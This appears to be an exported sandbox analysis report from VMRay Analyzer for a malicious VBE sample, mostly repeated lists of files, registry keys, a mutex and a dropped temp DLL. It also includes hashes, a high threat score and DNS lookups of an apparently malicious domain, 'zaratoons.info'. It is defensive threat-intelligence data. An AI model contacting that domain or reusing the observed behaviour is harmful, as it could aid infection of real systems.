windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
conout$
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
File
conout$
Analyzed Sample #632978
Malware Artifacts
632978
Sample-ID: #632978
Job-ID: #872934
This sample was analyzed by VMRay Analyzer 3.0.1 on a Windows 7 system
92
VTI Score based on VTI Database Version 3.3
Metadata of Sample File #632978
Submission-ID: #1030294
04ad737a63367cfb492597ba86fd3509eb7340f2b762d830c05dfd9fe9870a07vbe
MD5
c0b9640880d94923f8aeb1b7944a4f69
SHA1
2dddc57a59b07449a052167218bc3a198c8cd82c
SHA256
04ad737a63367cfb492597ba86fd3509eb7340f2b762d830c05dfd9fe9870a07
Opened_By
Metadata of Analysis for Job-ID #872934
False
Timeout
True
989.593
XDUWTFONO
win7_64_sp1
x86 64-bit
Windows 7
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
5p5NrGJn0jS HALPmcxz
XDUWTFONO
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_create_many_processes
Above average number of processes were monitored.
Creates an unusually large number of processes
Network
VTI rule match with VTI rule score 2/5
